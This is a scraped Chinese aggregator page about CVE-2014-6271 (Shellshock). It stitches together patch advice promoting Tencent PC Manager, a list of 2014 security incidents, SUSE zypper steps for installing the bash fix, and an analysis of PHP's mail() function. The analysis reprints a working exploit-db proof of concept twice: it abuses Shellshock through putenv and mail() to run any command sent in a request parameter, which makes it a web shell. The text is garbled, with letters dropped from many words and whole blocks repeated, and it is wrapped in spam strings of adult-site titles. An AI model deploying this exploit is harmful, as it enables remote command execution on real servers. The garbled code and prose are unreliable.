• <em id="6vhwh"><rt id="6vhwh"></rt></em>

    <style id="6vhwh"></style>

    <style id="6vhwh"></style>
    1. <style id="6vhwh"></style>
        <sub id="6vhwh"><p id="6vhwh"></p></sub>
        <p id="6vhwh"></p>
          1. 国产亚洲欧洲av综合一区二区三区 ,色爱综合另类图片av,亚洲av免费成人在线,久久热在线视频精品视频,成在人线av无码免费,国产精品一区二区久久毛片,亚洲精品成人片在线观看精品字幕 ,久久亚洲精品成人av秋霞

            cve

            更新時間:2023-02-28 21:43:41 閱讀: 評論:0

            CVE-2014-6271漏洞怎么修復

            使用騰訊電腦管家來修復就可以了- -
            重要的危險漏洞是需要修復的,不修復會導致病毒入侵,一些小的漏洞就無所謂了
            漏洞修復也可以使用騰訊電腦管家來修復
            下載打開騰訊電腦管家,修復漏洞就可以對系統漏洞進行修復掃描了
            非常便捷,而且騰訊電腦管家的漏洞全部來自微軟官網,可靠安全
            騰訊電腦管家還可以刪除已修復的漏洞,即是說,如果你的電腦與最新的漏洞相沖突,只要在“已安裝”中刪除就不會有問題了。

            Bash 漏洞 CVE-2014-6271 如何被利用?有何影響

            打開騰訊電腦管家——工具箱——修復漏洞,進行漏洞掃描和修復。
            建議設置開啟自動修復漏洞功能,開啟后,電腦管家可以在發現高危漏洞(僅包括高危漏洞,不包括其它漏洞)時,第一時間自動進行修復,無需用戶參與,最大程度保證用戶電腦安全。尤其適合老人、小孩或計算機初級水平用戶使用。開啟方式如下:進入電腦管家“修復漏洞”模塊—“設置”,點擊開啟自動修復漏洞即可。

            14年全球有哪些網絡被攻擊的案例

            事件一、1•21中國互聯網DNS大劫難
            2014年1月21日下午3點10分左右,國內通用頂級域的根服務器忽然出現異常,導致眾多知名網站出現DNS解析故障,用戶無法正常訪問。雖然國內訪問根服務器很快恢復,但由于DNS緩存問題,部分地區用戶“斷網”現象仍持續了數個小時,至少有2/3的國內網站受到影響。微博調查顯示,“1•21全國DNS大劫難”影響空前。事故發生期間,超過85%的用戶遭遇了DNS故障,引發網速變慢和打不開網站的情況。
            事件二、比特幣交易站受攻擊破產
            2014年2月,全球最大的比特幣交易平臺Mt.Gox由于交易系統出現漏洞,75萬個比特幣以及Mt.Gox自身賬號中約10萬個比特幣被竊,損失估計達到4.67億美元,被迫宣布破產。這一事件凸顯了互聯網金融在網絡安全威脅面前的脆弱性。
            事件三、攜程漏洞事件
            2014年3月22日,有安全研究人員在第三方漏洞收集平臺上報了一個題目為“攜程安全支付日志可遍歷下載導致大量用戶銀行卡信息泄露(包含持卡人姓名身份證、銀行卡號、卡CVV碼、6位卡Bin)”的漏洞。上報材料指出攜程安全支付日志可遍歷下載,導致大量用戶銀行卡信息泄露,并稱已將細節通知廠商并且等待廠商處理中。一石激起千層浪,該漏洞立即引發了關于“電商網站存儲用戶信用卡等敏感信息,并存在泄漏風險”等問題的熱議。
            事件四、XP系統停止服務
            微軟公司在2014年4月8日后對XP系統停止更新維護的服務。但XP仍然是當今世界被廣泛使用的操作系統之一。特別是在中國,仍有63.7%的用戶,也就是大約3億左右的用戶還在使用XP系統。因此“后XP時代”的信息安全一直備受關注,但國內安全廠商推出的防護軟件究竟效果如何,面對市場上如此多的安全防護軟件,選哪個又是一個疑問,所以xp挑戰賽應運而生。在2014年4月5日的XP挑戰賽中,騰訊、金山落敗360堅守成功。
            事件五、OpenSSL心臟出血漏洞
            2014年4月爆出了Heartbleed漏洞,該漏洞是近年來影響范圍最廣的高危漏洞,涉及各大網銀、門戶網站等。該漏洞可被用于竊取服務器敏感信息,實時抓取用戶的賬號密碼。從該漏洞被公開到漏洞被修復的這段時間內,已經有黑客利用OpenSSL漏洞發動了大量攻擊,有些網站用戶信息或許已經被黑客非法獲取。未來一段時間內,黑客可能會利用獲取到的這些用戶信息,在互聯網上再次進行其他形式的惡意攻擊,針對用戶的“次生危害”(如網絡詐騙等)會大量集中顯現。即使是在今后十年中,預計仍會在成千上萬臺服務器上發現這一漏洞,甚至包括一些非常重要的服務器。
            事件六、中國快遞1400萬信息泄露
            2014年4月,國內某黑客對國內兩個大型物流公司的內部系統發起網絡攻擊,非法獲取快遞用戶個人信息1400多萬條,并出售給不法分子。而有趣的是,該黑客販賣這些信息僅獲利1000元。根據媒體報道,該黑客僅是一名22歲的大學生,正在某大學計算機專業讀大學二年級。
            事件七、eBay數據的大泄漏
            2014年5月22日,eBay要求近1.28億活躍用戶全部重新設置密碼,此前這家零售網站透露黑客能從該網站獲取密碼、電話號碼、地址及其他個人數據。該公司表示,黑客網絡攻擊得手的eBay數據庫不包含客戶任何財務信息——比如信用卡號碼之類的信息。eBay表示該公司會就重設密碼一事聯系用戶以解決這次危機。這次泄密事件發生在今年2月底和3月初,eBay是在5月初才發現這一泄密事件,并未說明有多少用戶受到此次事件的影響。
            事件八、BadUSB漏洞
            2014年8月,在美國黑帽大會上,JakobLell和KarstenNohl公布了BadUSB漏洞。攻擊者利用該漏洞將惡意代碼存放在USB設備控制器的固件存儲區,而不是存放在其它可以通過USB接口進行讀取的存儲區域。這樣,殺毒軟件或者普通的格式化操作是清除不掉該代碼的,從而使USB設備在接入PC等設備時,可以欺騙PC的操作系統,從而達到某些目的。
            事件九、Shellshock漏洞
            2014年9月25日,US-CERT公布了一個嚴重的Bash安全漏洞(CVE-2014 -6271) 。由于Bash是Linux用戶廣泛使用的一款用于控制命令提示符工具,從而導致該漏洞影響范圍甚廣。安全專家表示,由于并非所有運行Bash的電腦都存在漏洞,所以受影響的系統數量或許不及“心臟流血”。不過,Shellshock本身的破壞力卻更大,因為黑客可以借此完全控制被感染的機器,不僅能破壞數據,甚至會關閉網絡,或對網站發起攻擊。
            事件十、500萬谷歌賬戶信息被泄露
            2014年9月,大約有500萬谷歌的賬戶和密碼的數據庫被泄露給一家俄羅斯互聯網網絡安全論壇。這些用戶大多使用了Gmail郵件服務和美國互聯網巨頭的其他產品。據俄羅斯一個受歡迎的IT新聞網站CNews報道,論壇用戶tvskit聲稱60%的密碼是有效的,一些用戶也確認在數據庫里發現他們的數據。
            事件十一、颶風熊貓本地提權工具
            2014年10月,CrowdStrike發現颶風熊貓這個本地提權工具,颶風熊貓是主要針對基礎設施公司的先進攻擊者。國外專業人士還表示,該攻擊代碼寫的非常好,成功率為100%。我們知道颶風熊貓使用的是“ChinaChopper”Webshell,而一旦上傳這一Webshell,操作者就可試圖提升權限,然后通過各種密碼破解工具獲得目標訪問的合法憑證。該本地提權工具影響了所有的Windows版本,包括Windows7和WindowsServer 2008 R2 及以下版本。
            事件十二、賽門鐵克揭秘間諜工具regin
            2014年11月24日,賽門鐵克發布的一份報告稱,該公司發現了一款名為“regin”的先進隱形惡意軟件。這是一款先進的間諜軟件,被稱為史上最為復雜的后門木馬惡意軟件。該軟件被用于監視政府機關、基礎設施運營商、企業、研究機構甚至針對個人的間諜活動中。
            事件十三、索尼影業公司被黑客攻擊
            2014年12月,索尼影業公司被黑客攻擊。黑客對索尼影業公司發動的這次攻擊影響令人感到震驚:攝制計劃、明星隱私、未發表的劇本等敏感數據都被黑客竊取,并逐步公布在網絡上,甚至包括到索尼影業員工的個人信息。預計索尼影業損失高達1億美元,僅次于2011年被黑客攻擊的損失。
            事件十四、12306用戶數據泄露含身份證及密碼信息
            2014年12月25日,烏云漏洞報告平臺報告稱,大量12306用戶數據在互聯網瘋傳,內容包括用戶帳號、明文密碼、身份證號碼、手機號碼和電子郵箱等。這次事件是黑客首先通過收集互聯網某游戲網站以及其他多個網站泄露的用戶名和密碼信息,然后通過撞庫的方式利用12306的安全機制的缺欠來獲取了這13萬多條用戶數據。同時360互聯網安全中心就此呼吁,12306用戶盡快修改密碼,避免已經訂到的火車票被惡意退票。另外如果有其他重要帳號使用了和12306相同的注冊郵箱和密碼,也應盡快修改密碼,以免遭遇盜號風險。

            ubuntu有zypper命令嗎

            zypper源的配置

            SUSE的zypper本地源配置起來跟yum的配置很相似,它們的配置文件有很多相似之處。不過,個人覺得zypper這個工具稍微強大些。在SUSE下,可以通過一條zypper的命令,即可完成zypper源的配置。

            以下包是SUSE的Bash最新升級包,接下來的操作是把下面的升級包作為一個本地倉庫,供以后zypper update來使用,

            1
            2
            3
            4
            5
            6
            7
            8
            9
            10

            funny:~ # unzip CVE-2014-6271.zip
            Archive: CVE-2014-6271.zip
            creating: CVE-2014-6271/
            inflating: CVE-2014-6271/bash 9740.htm
            inflating: CVE-2014-6271/bash-3.2-147.20.1.x86_64.rpm
            inflating: CVE-2014-6271/bash-doc-3.2-147.20.1.x86_64.rpm
            inflating: CVE-2014-6271/libreadline5-32bit-5.2-147.20.1.x86_64.rpm
            inflating: CVE-2014-6271/libreadline5-5.2-147.20.1.x86_64.rpm
            inflating: CVE-2014-6271/licen_agreement.txt
            inflating: CVE-2014-6271/readline-doc-5.2-147.20.1.x86_64.rpm

            接下來的操作是把這些包放到一個目錄里,然后把該目錄做成系統的一個更新源。比如,把解壓后的目錄放到/opt目錄下,然后使用zypper ar添加該zypper源。

            1
            2
            3
            4
            5
            6
            7
            8

            funny:~ # mv CVE-2014-6271 /opt/update
            funny:~ # zypper ar file:///opt/update update
            Adding repository 'update' [done]
            Repository 'update' successfully added
            Enabled: Yes
            Autorefresh: No
            GPG check: Yes
            URI: file:/opt/update

            接下來,使用zypper lr驗證下,

            1
            2
            3
            4
            5

            funny:~ # zypper lr
            # | Alias | Name | Enabled | Refresh
            --+--------+--------+---------+--------
            1 | local | local | Yes | Yes
            2 | update | update | Yes | No

            php executecommand是阻塞的么

            PHP Execute Command Bypass Disable_functions
            先簡單說一下php調用mail()函數的過程。
            看到源碼ext/mail.c

            236行:

            Default

            char *ndmail_path = INI_STR("ndmail_path");
            char *ndmail_cmd = NULL;

            char *ndmail_path = INI_STR("ndmail_path");
            char *ndmail_cmd = NULL;
            從INI中獲得ndmail_path變量。我們看看php.ini里是怎么說明的:

            Default

            ; For Unix only. You may supply arguments as well (default: "ndmail -t -i").
            ;ndmail_path =

            ; For Unix only. You may supply arguments as well (default: "ndmail -t -i").
            ;ndmail_path =
            注釋中可以看到,nd_mail默認值為”ndmail -t -i”.

            extra_cmd(用戶傳入的一些額外參數)存在的時候,調用spprintf將ndmail_path和extra_cmd組合成真正執行的命令行ndmail_cmd 。不存在則直接將ndmail_path賦值給ndmail_cmd 。
            如下:

            Default

            if (!ndmail_path) {
            #if (defined PHP_WIN32 || defined NETWARE)
            /* handle old style win smtp nding */
            if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
            if (tsm_errmsg) {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
            efree(tsm_errmsg);
            } el {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
            }
            MAIL_RET(0);
            }
            MAIL_RET(1);
            #el
            MAIL_RET(0);
            #endif
            }
            if (extra_cmd != NULL) {
            spprintf(&ndmail_cmd, 0, "%s %s", ndmail_path, extra_cmd);
            } el {
            ndmail_cmd = ndmail_path;
            }
            if (!ndmail_path) {
            #if (defined PHP_WIN32 || defined NETWARE)
            /* handle old style win smtp nding */
            if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
            if (tsm_errmsg) {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
            efree(tsm_errmsg);
            } el {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
            }
            MAIL_RET(0);
            }
            MAIL_RET(1);
            #el
            MAIL_RET(0);
            #endif
            }
            if (extra_cmd != NULL) {
            spprintf(&ndmail_cmd, 0, "%s %s", ndmail_path, extra_cmd);
            } el {
            ndmail_cmd = ndmail_path;
            }
            之后執行:

            Default

            #ifdef PHP_WIN32
            ndmail = popen_ex(ndmail_cmd, "wb", NULL, NULL TSRMLS_CC);
            #el
            /* Since popen() doesn't indicate if the internal fork() doesn't work
            * (e.g. the shell can't be executed) we explicitly t it to 0 to be
            * sure we don't catch any older errno value. */
            errno = 0;
            ndmail = popen(ndmail_cmd, "w");
            #endif
            #ifdef PHP_WIN32
            ndmail = popen_ex(ndmail_cmd, "wb", NULL, NULL TSRMLS_CC);
            #el
            /* Since popen() doesn't indicate if the internal fork() doesn't work
            * (e.g. the shell can't be executed) we explicitly t it to 0 to be
            * sure we don't catch any older errno value. */
            errno = 0;
            ndmail = popen(ndmail_cmd, "w");
            #endif
            將ndmail_cmd丟給popen執行。
            如果系統默認sh是bash,popen就會丟給bash執行。而之前的bash破殼(CVE-2014-6271)漏洞,直接導致我們可以利用mail()函數執行任意命令,繞過disable_functions。

            影響版本:php 各版本

            修復方法:修復CVE-2014-6271

            給出POC(http://www.exploit-db.com/exploits/35146/)如下:

            Default

            <?php
            # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
            # Google Dork: none
            # Date: 10/31/2014
            # Exploit Author: Ryan King (Starfall)
            # Vendor Homepage: http://php.net
            # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
            # Version: 5.* (tested on 5.6.2)
            # Tested on: Debian 7 and CentOS 5 and 6
            # CVE: CVE-2014-6271

            function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283
            $tmp = tempnam(".","data");
            putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
            // In Safe Mode, the ur may only alter environment variableswho names
            // begin with the prefixes supplied by this directive.
            // By default, urs will only be able to t environment variablesthat
            // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive impty,
            // PHP will let the ur modify ANY environment variable!
            mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallynd any mail
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if($output != "") return $output;
            el return "No output, or not vuln.";
            }
            echo shellshock($_REQUEST["cmd"]);
            ?>
            <?php
            # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
            # Google Dork: none
            # Date: 10/31/2014
            # Exploit Author: Ryan King (Starfall)
            # Vendor Homepage: http://php.net
            # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
            # Version: 5.* (tested on 5.6.2)
            # Tested on: Debian 7 and CentOS 5 and 6
            # CVE: CVE-2014-6271

            function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283
            $tmp = tempnam(".","data");
            putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
            // In Safe Mode, the ur may only alter environment variableswho names
            // begin with the prefixes supplied by this directive.
            // By default, urs will only be able to t environment variablesthat
            // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive impty,
            // PHP will let the ur modify ANY environment variable!
            mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallynd any mail
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if($output != "") return $output;
            el return "No output, or not vuln.";
            }
            echo shellshock($_REQUEST["cmd"]);
            ?>
            [via@phith0n ]

            linux配置源怎么打開使用 zypper install syslog-ng -y

            一、zypper源的配置

            SUSE的zypper本地源配置起來跟yum的配置很相似,它們的配置文件有很多相似之處。不過,個人覺得zypper這個工具稍微強大些。在SUSE下,可以通過一條zypper的命令,即可完成zypper源的配置。

            以下包是SUSE的Bash最新升級包,接下來的操作是把下面的升級包作為一個本地倉庫,供以后zypper update來使用,

            1
            2
            3
            4
            5
            6
            7
            8
            9
            10

            funny:~ # unzip CVE-2014-6271.zip
            Archive: CVE-2014-6271.zip
            creating: CVE-2014-6271/
            inflating: CVE-2014-6271/bash 9740.htm
            inflating: CVE-2014-6271/bash-3.2-147.20.1.x86_64.rpm
            inflating: CVE-2014-6271/bash-doc-3.2-147.20.1.x86_64.rpm
            inflating: CVE-2014-6271/libreadline5-32bit-5.2-147.20.1.x86_64.rpm
            inflating: CVE-2014-6271/libreadline5-5.2-147.20.1.x86_64.rpm
            inflating: CVE-2014-6271/licen_agreement.txt
            inflating: CVE-2014-6271/readline-doc-5.2-147.20.1.x86_64.rpm

            接下來的操作是把這些包放到一個目錄里,然后把該目錄做成系統的一個更新源。比如,把解壓后的目錄放到/opt目錄下,然后使用zypper ar添加該zypper源。

            1
            2
            3
            4
            5
            6
            7
            8

            funny:~ # mv CVE-2014-6271 /opt/update
            funny:~ # zypper ar file:///opt/update update
            Adding repository 'update' [done]
            Repository 'update' successfully added
            Enabled: Yes
            Autorefresh: No
            GPG check: Yes
            URI: file:/opt/update

            接下來,使用zypper lr驗證下,

            1
            2
            3
            4
            5

            funny:~ # zypper lr
            # | Alias | Name | Enabled | Refresh
            --+--------+--------+---------+--------
            1 | local | local | Yes | Yes
            2 | update | update | Yes | No

            說明我們已成功添加update的源。另外,執行”zypper ar URI alias“后,會在/etc/zypp/repo.d/目錄下生成alias.repo配置文件。接下來,我們試試zypper update命令,看是不是可以真的可以升級?

            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26

            funny:~ # zypper update
            Building repository 'update' cache [done]
            Loading repository data...
            Reading installed packages...

            The following packages are going to be upgraded:
            bash bash-doc libreadline5 readline-doc

            The following packages are not supported by their vendor:
            bash bash-doc libreadline5 readline-doc

            4 packages to upgrade.
            Overall download size: 923.0 KiB. ...
            Continue? [y/n/?] (y): y
            Retrieving package libreadline5-5.2-147.20.1.x86_64 (1/4), ...
            Retrieving package bash-3.2-147.20.1.x86_64 (2/4), ...
            Retrieving package readline-doc-5.2-147.20.1.x86_64 (3/4), ...
            Retrieving package bash-doc-3.2-147.20.1.x86_64 (4/4), ...
            Retrieving package libreadline5-5.2-147.20.1.x86_64 (1/4), ...
            Installing: libreadline5-5.2-147.20.1 [done]
            Retrieving package bash-3.2-147.20.1.x86_64 (2/4), ...
            Installing: bash-3.2-147.20.1 [done]
            Retrieving package readline-doc-5.2-147.20.1.x86_64 (3/4), ...
            Installing: readline-doc-5.2-147.20.1 [done]
            Retrieving package bash-doc-3.2-147.20.1.x86_64 (4/4), ...
            Installing: bash-doc-3.2-147.20.1 [done]

            以上說明可以進行升級的。接下來,我們使用zypper ps命令,可以查看有哪些終端還在使用之前沒有升級過的bash,

            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11

            funny:/etc/zypp/repos.d # zypper ps
            The following running process u deleted files:

            PID | PPID | UID | Login | Command | Files
            ------+-------+-----+-------+---------+--------------------------
            2663 | 2542 | 0 | root | bash | /lib64/libreadline.so.5.2
            | | | | | /bin/bash (deleted)
            22426 | 22423 | 0 | root | bash | /lib64/libreadline.so.5.2
            | | | | | /bin/bash (deleted)

            You may wish to restart the process.

            二、zypper命令選項介紹

            1. zypper的幾個重要選項:

            選項
            說明
            repos, lr
            列出庫
            sl
            列出庫(目的是與rug兼容)
            addrepo, ar 添加庫
            sa 添加庫(目的是與rug兼容)
            renamerepo, nr 重命名指定的安裝源
            modifyrepo, mr 修改指定的安裝源
            refresh, ref 刷新所有安裝源
            clean 清除本地緩存

            2. zypper軟件管理:

            選項 說明
            install, in
            安裝軟件包
            remove, rm 刪除軟件包
            verify, ve 檢驗軟件包依賴關系的完整性
            update, up 更新已安裝的軟件包到新的版本
            dist-upgrade, dup
            整個系統的升級
            source-install, si 安裝源代碼軟件包和它們的編譯依賴

            3. zypper的查詢選項:

            選項
            說明
            arch, 安裝軟件包
            packages, pa
            列出所有可用的軟件包
            patterns, pt 列出所有可用的模式
            products, pd 列出所有可用的產品
            what-provides, wp 列出能夠提供指定功能的軟件包

            本文發布于:2023-02-28 18:58:00,感謝您對本站的認可!

            本文鏈接:http://www.newhan.cn/zhishi/a/167759182148520.html

            版權聲明:本站內容均來自互聯網,僅供演示用,請勿用于商業和其他非法用途。如果侵犯了您的權益請與我們聯系,我們將在24小時內刪除。

            本文word下載地址:cve.doc

            本文 PDF 下載地址:cve.pdf

            標簽:cve
            相關文章
            留言與評論(共有 0 條評論)
               
            驗證碼:
            Copyright ?2019-2022 Comsenz Inc.Powered by ? 實用文體寫作網旗下知識大全大全欄目是一個全百科類寶庫! 優秀范文|法律文書|專利查詢|
            主站蜘蛛池模板: 无码国产精品免费看| 欧美乱妇xxxxxbbbbb| 亚洲暴爽av天天爽日日碰| 国产360激情盗摄全集| 57pao国产成视频免费播放| 亚洲精品综合一区二区在线| 性欧美乱熟妇xxxx白浆| 亚洲第一无码AV无码专区| 无码一区二区三区AV免费| 国产一级人片内射视频播放| 国产免费高清69式视频在线观看 | av色蜜桃一区二区三区| 欧美性猛交xxxx乱大交丰满| 97午夜理论电影影院| 亚洲欧洲日韩国内高清| 亚洲欧美高清在线精品一区二区| 猛男被狂c躁到高潮失禁男男小说| 亚洲www永久成人网站| jlzzjlzz全部女高潮| av综合亚洲一区二区| 国产精品99久久免费| 东京热大乱系列无码| 欧洲成人在线观看| 亚洲欧洲∨国产一区二区三区 | 欧美色a电影精品aaaa| 国产精品一区二区三区三级| 亚洲真人无码永久在线| 亚洲男人在线天堂| 精品国产欧美一区二区五十路| 又粗又爽高潮午夜免费视频| 亚洲AV福利天堂在线观看| 日韩精品一区二区三区激| 久久月本道色综合久久| 中国无码人妻丰满熟妇啪啪软件| 欧美日韩精品一区二区视频| 欧美成人www在线观看| 深夜免费av在线观看| 国产自偷亚洲精品页65页| 麻豆精品一区二区三区蜜臀| 国产91小视频在线观看| 国产亚洲精品日韩av在|